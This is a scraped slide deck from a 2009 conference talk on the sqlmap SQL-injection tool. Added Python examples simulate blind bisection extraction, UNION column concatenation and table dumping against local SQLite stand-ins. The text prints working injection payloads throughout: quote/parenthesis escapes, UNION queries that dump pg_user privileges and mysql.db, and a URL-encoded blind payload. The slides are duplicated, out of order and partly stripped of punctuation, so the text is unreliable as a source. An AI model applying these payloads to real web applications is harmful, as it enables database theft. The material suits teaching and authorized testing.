DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
Give me a SQL shell

It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution. The tool inspects the provided statement:
- If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output
- If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them
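The statement inspection this slide describes, as an added example that is not code from the original slides or from sqlmap: a small classifier that finds the first keyword after leading comments, whitespace and parentheses, and routes a SELECT to the inferential or UNION technique and anything else to stacked queries, refusing when the injection point does not support them. The statement categories and the prefer_union / stacked_supported options are assumptions of this example.

```python
import re

DML = {"INSERT", "UPDATE", "DELETE", "REPLACE", "MERGE"}
TRANSACTION = {"BEGIN", "START", "COMMIT", "ROLLBACK", "SAVEPOINT"}


def first_keyword(statement):
    """First SQL keyword, ignoring leading whitespace, comments and parentheses."""
    s = re.sub(r"/\*.*?\*/", " ", statement, flags=re.S)  # block comments
    s = re.sub(r"--[^\n]*", " ", s)                         # line comments
    s = s.lstrip(" \t\r\n(")
    m = re.match(r"[A-Za-z_]+", s)
    return m.group(0).upper() if m else ""


def classify(statement):
    """'select', 'dml', 'transaction', 'other' or 'empty'."""
    kw = first_keyword(statement)
    if not kw:
        return "empty"
    if kw == "SELECT":
        return "select"
    if kw in DML:
        return "dml"
    if kw in TRANSACTION:
        return "transaction"
    return "other"


def choose_technique(statement, prefer_union=False, stacked_supported=False):
    """Technique used to run a statement typed at the SQL shell prompt.

    A SELECT has an output to read back, so it goes through the inferential
    blind or the UNION query technique (the option decides which). Anything
    else produces no output to read and needs stacked queries, which only work
    when the application's database layer accepts more than one statement.
    """
    kind = classify(statement)
    if kind == "empty":
        raise ValueError("empty statement")
    if kind == "select":
        return "union" if prefer_union else "inferential"
    if not stacked_supported:
        raise ValueError("%s statement needs stacked queries, which this "
                         "injection point does not support" % kind)
    return "stacked"


def can_run(statement, stacked_supported=False):
    """Whether the shell can run the statement at all on this injection point."""
    try:
        choose_technique(statement, stacked_supported=stacked_supported)
        return True
    except ValueError:
        return False
```

The refusal path is the interesting one for a defender: a database API that executes one statement per call (as most prepared-statement interfaces do) leaves nothing but SELECT-based read-back available through the injection point.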
Automation vs granularity (1/2)

sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications. Providing it with a source of targets, it can automatically:
- Detect all possible SQL injections and confirm them
- Identify the SQL query syntax
- Fingerprint the back-end DBMS

The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' datatypes, etc. There is an option to dump the whole back-end DBMS.
Automation vs granularity (2/2)

The tester is a professional: he knows what he does and why. There are options to specify:
- How to compare True and False HTTP responses
- A single or more testable parameters
- The SQL payload prefix and postfix
- A single or a range of entries to dump from a table
- A single or multiple columns to dump from a table
- Custom SQL statements to run

Options can be specified from both the command line and/or a configuration file. Options are documented in the user's manual with examples.
Third demo

"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting." – Richard Stallman
Limitations

Can sqlmap fail to detect or to exploit a SQL injection vulnerability? Yes, in some cases, mainly because it does not support:
- SQL injection on SQL clauses other than WHERE
- Time-based blind SQL injection technique

...but I am working on these and others.
Want to contribute?

I am always looking forward to code contributions. Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists. I can provide you with:
- Details on code internals
- Write access to the Subversion repository
- Access to the development platform
- A beer if you are in the London area
Links and contacts

Homepage: http://sqlmap.sourceforge.net
Documentation:
- http://sqlmap.sourceforge.net/dev/index.html
- http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
- https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
- E-mail / Jabber: bernardo.damele@gmail.com
- Blog: http://bernardodamele.blogspot.com
References

- OWASP Testing Guide, Open Web Application Security Project
- Exploit of a Mom, xkcd
- Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
- Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
- Metasploit Framework, H D Moore and the Metasploit development team
- w3af, Andres Riancho and the w3af development team
- Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
- Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
- Python difflib, Python Software Foundation
- NULL (SQL), Wikipedia
- Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
- Insight on UNION query SQL injection, Bernardo Damele A. G.
- DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)

Questions?

Thanks for your attention.
sqlmap features (2/2)

More features:
-  Silent to verbose output messages
- Granularity in the user's options
- Support for concurrent HTTP requests (multi-threading)
- Estimated time of arrival
- Session save and resume
- Options from command line and/or configuration file
- Integration with Metasploit and w3af
- File system read and write access and operating system command execution by providing own queries, depending on the session user privileges and back-end DBMS
Real world

"Have you ever had a dream, Neo, that you were so sure was real? What if you were unable to wake from that dream? How would you know the difference between the dream world and the real world?" – Morpheus, The Matrix
Dealing with advertisements (1/3)

In the real world web applications are often complex. Usually the page content changes at each refresh: they have inline counters, advertisement banners, clocks, etc. The inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query.
Dealing with advertisements (2/3)

Obstacle: if the page content does not depend only on the SQL statement and changes at each refresh, then the algorithm may not work.
Dealing with advertisements (3/3)

The Python difflib library helped to solve this problem: for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content and returns a measure of the two page contents' similarity as a float in the range [0, 1] (to 3 decimal digits).
It works also when the original page is stable but the injected query with a valid condition (True) differs.
If the automatic comparison fails, the user can provide a string or a regular expression to match on both the original and True page contents and to not match on False page contents.
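The comparison described on these three slides, as an added example that is not code from the original slides or from sqlmap: a comparator built on difflib.SequenceMatcher that scores each response against the untouched original page, plus the fallback to a user-supplied string or regular expression. The sample pages (an advertisement slot and a visit counter that change on every refresh), the calibration step against one known True and one known False response, and the 0.02 minimum gap are assumptions made for this example.

```python
import difflib
import re

# Constructed sample responses (not from the original slides). The application
# renders an advertisement slot and a visit counter that change on every
# refresh, so no two responses are byte-identical even for the same query.
ORIGINAL_PAGE = (
    "<html><body><div class='ad'>banner-1234</div>"
    "<h1>Profile</h1><p>Welcome back, alice</p><p>Last login: 2009-01-09</p>"
    "<div class='counter'>visits: 10471</div></body></html>"
)
# Same query with an injected condition that holds (True): only the
# refresh-dependent parts differ from the original.
TRUE_PAGE = ORIGINAL_PAGE.replace("banner-1234", "banner-5678").replace("10471", "10472")
# Injected condition that does not hold (False): the WHERE clause matched no
# row and the application rendered its "not found" branch instead.
FALSE_PAGE = (
    "<html><body><div class='ad'>banner-5679</div>"
    "<h1>Profile</h1><p>No such user</p>"
    "<div class='counter'>visits: 10473</div></body></html>"
)
# A target where the injected condition never changes the page (only the
# refresh noise differs): automatic comparison cannot tell True from False.
FLAT_PAGE = ORIGINAL_PAGE.replace("banner-1234", "banner-9870").replace("10471", "10475")

MIN_GAP = 0.02  # assumption: smallest usable ratio gap between True and False pages


def page_ratio(original, page):
    """Similarity of two page bodies as a float in [0, 1], to 3 decimal digits.

    SequenceMatcher.ratio() is 2*M/T, M being the matched characters and T the
    combined length, so a banner or counter that changes on every refresh costs
    a few hundredths while a different page template costs far more.
    """
    return round(difflib.SequenceMatcher(None, original, page).ratio(), 3)


class PageComparator:
    """Decides whether a response corresponds to a True or a False injected condition."""

    def __init__(self, original, string=None, regex=None):
        self.original = original
        self.string = string   # substring expected on original and True pages only
        self.regex = regex     # or a regular expression with the same property
        self.threshold = None

    def calibrate(self, true_page, false_page):
        """Set the ratio threshold halfway between a known True and a known False response."""
        true_ratio = page_ratio(self.original, true_page)
        false_ratio = page_ratio(self.original, false_page)
        if true_ratio - false_ratio < MIN_GAP:
            raise ValueError("True (%.3f) and False (%.3f) responses are too similar; "
                             "supply a string or regex instead" % (true_ratio, false_ratio))
        self.threshold = round((true_ratio + false_ratio) / 2, 3)
        return self.threshold

    def matches(self, page):
        if self.string is not None:
            return self.string in page
        return re.search(self.regex, page) is not None

    def is_true(self, page):
        if self.string is not None or self.regex is not None:
            return self.matches(page)
        if self.threshold is None:
            raise RuntimeError("call calibrate() first or supply a string/regex")
        return page_ratio(self.original, page) >= self.threshold


def calibrated(original, true_page, false_page):
    """Comparator with its threshold derived from the two calibration pages."""
    comparator = PageComparator(original)
    comparator.calibrate(true_page, false_page)
    return comparator


def calibration_fails(original, true_page, false_page):
    """True when the ratio test cannot separate the two calibration pages."""
    try:
        PageComparator(original).calibrate(true_page, false_page)
        return False
    except ValueError:
        return True


def usable_match(comparator, true_page, false_page):
    """A string/regex is usable if it matches the original and True pages but not the False one."""
    return (comparator.matches(comparator.original) and comparator.matches(true_page)
            and not comparator.matches(false_page))
```

The FLAT_PAGE case is the one the slide calls "the automatic comparison fails": both calibration responses score the same against the original, so no threshold separates them and only a content-based match can; usable_match is the check that a candidate string or regex actually has the property the slide requires of it.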
To NULL or not to NULL (1/4)

In standard SQL, NULL is allowed as a value for a table column field.
In the inferential blind SQL injection technique, usually a bisection algorithm is used to identify whether the ordinal value of the Nth query output character is higher than a certain ASCII table number; this causes the page content to be True or False. The SQL statement used by sqlmap, depending on the back-end DBMS, is similar to:

    ASCII(SUBSTR((SQL query), <Nth SQL query output char>, 1)) > <bisection algorithm number>
To NULL or not to NULL (2/4)

Obstacle: on some DBMS the substring function cannot be used on NULL.
To NULL or not to NULL (3/4)

A possible solution for this problem consists in modifying all the SQL query's columns explicitly:
- Casting its output to be a string
- Returning the value ' ' (space) if the casted value is still NULL

Example on MySQL 5.0. The SQL query to enumerate the column name's first entry is:

    SELECT name FROM test.users LIMIT 0, 1

Casted SQL query:

    SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1
To NULL or not to NULL (4/4)

The inferential blind SQL injected statement will then be:

    ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1), <Nth SQL query output character>, 1)) > <bisection algorithm number>

URL encoded (here for the first output character and bisection number 63):

    ORD%28MID%28%28SELECT%20IFNULL%28CAST%28name%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20test.users%20LIMIT%200%2C%201%29%2C%201%2C%201%29%29%20%3E%2063
SQL payload (1/3)

You have got an injection point. The injection point is in a SQL statement as follows:

    SELECT * FROM users WHERE id LIKE ((('$_GET[id]'))) LIMIT 0, 1
SQL payload (2/3)

Obstacle: the injection is after a LIKE clause, within three parentheses, and the statement terminates with a LIMIT clause.
SQL payload (3/3)

In this example the SQL payload that sqlmap identifies is:

    id=1'))) AND ((('RaNd' LIKE 'RaNd

In the inferential blind SQL injection algorithm it will be:

    id=1'))) AND ORD(MID((SQL query), <Nth SQL query output character>, 1)) > <bisection algorithm number> AND ((('RaNd' LIKE 'RaNd

In the UNION query SQL injection technique it will be:

    id=1'))) UNION ALL SELECT NULL, <concatenated SQL query>, NULL AND ((('RaNd' LIKE 'RaNd
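An added example, not code from the original slides or from sqlmap, that walks the inferential blind technique of the "To NULL or not to NULL" slides and the prefix/postfix wrapping of the "SQL payload" slides end to end against a local stand-in. SQLite replaces MySQL (unicode(), substr(), ifnull() and CAST(... AS TEXT) for ORD(), MID(), IFNULL() and CAST(... AS CHAR(10000))); the users table with its NULL entry, the application's query template and the 7-bit character range of the bisection are constructed assumptions. It shows why the NULL-safe cast is needed: without it the comparison is never true for a NULL entry, the bisection converges on 0, and the entry reads back as an empty string, which also ends the extraction.

```python
import sqlite3
from urllib.parse import quote

# Constructed stand-in for the vulnerable application (not from the original
# slides). The statement is the one of the "SQL payload" slides: the parameter
# lands after a LIKE clause inside three parentheses and the statement ends
# with a LIMIT clause.
QUERY_TEMPLATE = "SELECT * FROM users WHERE id LIKE ((('%s'))) LIMIT 0, 1"

# Payload prefix and postfix identified for that injection point: close the
# string and the three parentheses, append the boolean expression, then reopen
# them so that the application's trailing "'))) LIMIT 0, 1" still parses.
PREFIX = "1')))"
POSTFIX = " AND ((('RaNd' LIKE 'RaNd"


def build_db():
    """Sample data (constructed): the second user has a NULL name."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO users VALUES (1, 'admin'), (2, NULL), (3, 'bob');")
    return conn


class BlindOracle:
    """Answers True when the page shows a row, False otherwise, counting requests."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, expression):
        self.requests += 1
        param = PREFIX + " AND " + expression + POSTFIX
        try:
            return self.conn.execute(QUERY_TEMPLATE % param).fetchone() is not None
        except sqlite3.Error:
            return False  # an error page is indistinguishable from "no row" here


def entry_query(column, table, offset, cast):
    """Query for one entry; with cast=True the NULL-safe form of the slides."""
    if cast:
        column = "ifnull(CAST(%s AS TEXT), char(32))" % column
    return "SELECT %s FROM %s LIMIT %d, 1" % (column, table, offset)


def bisect_char(oracle, subquery, position, high=127):
    """Binary-search the code of the character at `position` (1-based), 7 requests.

    Each step asks "unicode(substr(output, position, 1)) > mid". Past the end
    of the output, or when the output is NULL, the comparison is never true and
    the search converges on 0, which the caller treats as end of string.
    """
    low = 0
    while low < high:
        mid = (low + high) // 2
        if oracle.ask("unicode(substr((%s), %d, 1)) > %d" % (subquery, position, mid)):
            low = mid + 1
        else:
            high = mid
    return low


def extract_entry(column, table, offset, cast, max_len=64):
    """Return (value, number of requests) for one entry of `column`."""
    oracle = BlindOracle(build_db())
    subquery = entry_query(column, table, offset, cast)
    chars = []
    for position in range(1, max_len + 1):
        code = bisect_char(oracle, subquery, position)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars), oracle.requests


def url_encode(payload):
    """Encode a payload the way it travels in the query string ('(' -> %28, ' ' -> %20)."""
    return quote(payload, safe="")


if __name__ == "__main__":
    for offset in range(3):
        print(offset, extract_entry("name", "users", offset, cast=False),
              extract_entry("name", "users", offset, cast=True))
```

The request counts are the point of the bisection: seven True/False responses per character whatever the character is, so the 'admin' entry costs 42 requests including the terminating probe, and a defender reading access logs sees that exact rhythm of near-identical requests differing only in the compared number.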
First demo

"I did every demo possible to see if the things would do what they were promising they would do." – Doug Hall
Bypass columns limitation (1/4)

You have got an injection point. It is vulnerable to UNION query SQL injection: sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing, depending on your options.
Bypass columns limitation (2/4)

Obstacle: the number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement.
Bypass columns limitation (3/4)

A possible solution consists in concatenating your SELECT statement's columns into a single output by using the specific DBMS string concatenation operator or function.

Example on PostgreSQL 8.3 to retrieve users' privileges. The SQL query to inject is:

    SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
Bypass columns limitation (4/4)

The injection will be:

    UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--

The CHR() chains are delimiters ("SrlGVt" marks the start of the output, "hdzQyZ" separates the columns and "KyPADf" marks the end), so that the concatenated values can be split back into columns when they are parsed out of the page content.
Going partial UNION (1/3)

Obstacle: you have got an injection point vulnerable to UNION query SQL injection, but only the query output's first entry (or a range of entries) is displayed in the page content.
Going partial UNION (2/3)

sqlmap automates a known technique:
- Changes the parameter value to its negative value, causing the original query to produce no output
- Inspects and unpacks the provided SQL statement
- Calculates its output's number of entries
- Limits it after the UNION ALL SELECT to return one entry at a time
- Repeats the previous action N times, where N is equal to the number of entries
Going partial UNION (3/3)

Example on MySQL 4.1 to enumerate the list of databases. The SQL query to inject is:

    SELECT db FROM mysql.db

sqlmap identified the injection point as being a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario). The injection will be:

    id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
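One added example, not code from the original slides or from sqlmap, serving both the "Bypass columns limitation" and the "Going partial UNION" slides: the four-column pg_user query is squeezed through a page that shows a single column of a single row, by concatenating the columns with NULL-safe casts and delimiters, counting the entries first and then reading them one at a time with LIMIT offset, 1. SQLite stands in for PostgreSQL/MySQL (it has the || operator, char(), CAST() and COALESCE(), and accepts LIMIT offset, count); the accounts table, the pg_user look-alike and the page template are constructed. The delimiters are the ones decoded from the CHR() chains on the PostgreSQL slide.

```python
import re
import sqlite3

# Constructed stand-in for the vulnerable application (not from the original
# slides). The page shows only the first row of the query output, and only
# two of its three columns.
APP_QUERY = "SELECT id, username, email FROM accounts WHERE id=%s"

# Delimiters decoded from the CHR() chains on the PostgreSQL slide: start of
# output, column separator, end of output. sqlmap picks them at random per run.
START, SEP, END = "SrlGVt", "hdzQyZ", "KyPADf"


def build_db():
    """Sample data (constructed); pg_user mimics the catalog table of the slide."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE accounts (id INTEGER, username TEXT, email TEXT);"
        "INSERT INTO accounts VALUES (1, 'alice', 'alice@example.invalid');"
        "CREATE TABLE pg_user (usename TEXT, usecreatedb TEXT, usesuper TEXT, usecatupd TEXT);"
        "INSERT INTO pg_user VALUES ('postgres', 't', 't', 't');"
        "INSERT INTO pg_user VALUES ('webapp', 'f', 'f', NULL);"
        "INSERT INTO pg_user VALUES ('backup', 'f', 't', 'f');")
    return conn


def render_page(conn, param):
    """The application: runs the query with the raw parameter and shows one row."""
    try:
        row = conn.execute(APP_QUERY % param).fetchone()
    except sqlite3.Error:
        return "<html><body>error</body></html>"
    if row is None:
        return "<html><body>not found</body></html>"
    return "<html><body><h1>%s</h1><p>%s</p></body></html>" % (row[1], row[2])


def as_chars(text):
    """Render a delimiter as char(...) so the payload needs no quote characters."""
    return "char(%s)" % ",".join(str(ord(c)) for c in text)


def concat_columns(columns):
    """Squeeze several columns into one NULL-safe, delimited string expression."""
    safe = ["COALESCE(CAST(%s AS TEXT), char(32))" % c for c in columns]
    parts = [as_chars(START), safe[0]]
    for column in safe[1:]:
        parts += [as_chars(SEP), column]
    parts.append(as_chars(END))
    return "||".join(parts)


def union_payload(columns, table, offset):
    """-1 silences the original query; LIMIT offset, 1 selects one entry at a time."""
    return "-1 UNION ALL SELECT NULL, %s, NULL FROM %s LIMIT %d, 1" % (
        concat_columns(columns), table, offset)


def parse_output(page):
    """Columns of the injected row, or None if the page carries no delimited output."""
    m = re.search(re.escape(START) + "(.*?)" + re.escape(END), page, re.S)
    return m.group(1).split(SEP) if m else None


def naive_union_fails(conn):
    """Four columns against a three-column SELECT: the DBMS rejects the statement."""
    page = render_page(conn, "-1 UNION ALL SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user")
    return "error" in page


def count_entries(conn, table):
    """Number of entries, read through the same single slot before the per-entry loop."""
    return int(parse_output(render_page(conn, union_payload(["COUNT(*)"], table, 0)))[0])


def dump_table(conn, columns, table):
    """Partial UNION: one request per entry, each reading the page's single slot."""
    rows = []
    for offset in range(count_entries(conn, table)):
        rows.append(parse_output(render_page(conn, union_payload(columns, table, offset))))
    return rows


if __name__ == "__main__":
    db = build_db()
    print(naive_union_fails(db))
    print(dump_table(db, ["usename", "usecreatedb", "usesuper", "usecatupd"], "pg_user"))
```

The NULL in the second pg_user row comes back as a single space, exactly as the CHAR(32) fallback on the slides intends, and the delimiters make the page parse independent of whatever HTML surrounds the displayed value. The count-then-loop shape also explains the request pattern such an extraction leaves in web server logs: N+1 requests that differ only in the LIMIT offset.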
DBMS fingerprint (1/4)

Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw. There are a few well known techniques and a few over-looked techniques. sqlmap implements up to four techniques; three of these are in use by other tools.
- The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software
- By default a basic DBMS fingerprint based on one or two techniques is done: only two HTTP requests are sent
- The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent
DBMS fingerprint (2/4)

The techniques implemented to perform an extensive back-end DBMS fingerprint are:
- Inband error messages
- Banner parsing
- SQL dialect
- Specific functions static output comparison

On a default installation all of them are reliable. On a hardened installation the last two are reliable.
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
